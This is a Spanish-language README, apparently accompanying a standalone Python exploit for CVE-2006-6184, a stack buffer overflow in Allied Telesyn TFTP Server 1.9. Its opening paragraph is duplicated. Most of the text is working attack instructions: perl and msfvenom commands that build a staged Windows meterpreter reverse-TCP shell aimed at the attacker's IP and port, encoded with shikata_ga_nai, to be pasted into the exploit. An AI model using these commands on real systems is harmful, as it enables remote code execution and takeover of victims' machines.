
Este es un exploit independiente basado en Python para CVE-2006-6184. Este exploit desencadena desbordamientos de búfer basados en pila en Allied Telesyn TFTP Server (AT-TFTP) 1.9, y posiblemente versiones anteriores, lo que permite a atacantes remotos provocar una denegación de servicio o ejecutar código arbitrario.
Este es un exploit independiente basado en Python para CVE-2006-6184. Este exploit provoca un desbordamiento de búfer basado en pila en Allied Telesyn TFTP Server (AT-TFTP) 1.9, y posiblemente versiones anteriores, lo que permite a atacantes remotos causar una denegación de servicio o ejecutar código arbitrario.
El payload debe personalizarse para incluir tu propia dirección IP y puerto de escucha, por lo que necesitarás generarlo manualmente. Para hacerlo, sigue los siguientes pasos:
1.) Introduce lo siguiente para crear un archivo hexadecimal de la cantidad que debe restarse del puntero de pila (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) A continuación, usa el siguiente comando para crear un payload de shell meterpreter por etapas:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) Después, combina los dos archivos que acabas de crear.
cat stackadj payload > shellcode
4.) Por último, eliminemos los caracteres malos.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
Introduce la salida como valor de la variable "payload". Puede que necesites ejecutar este exploit varias veces para que funcione.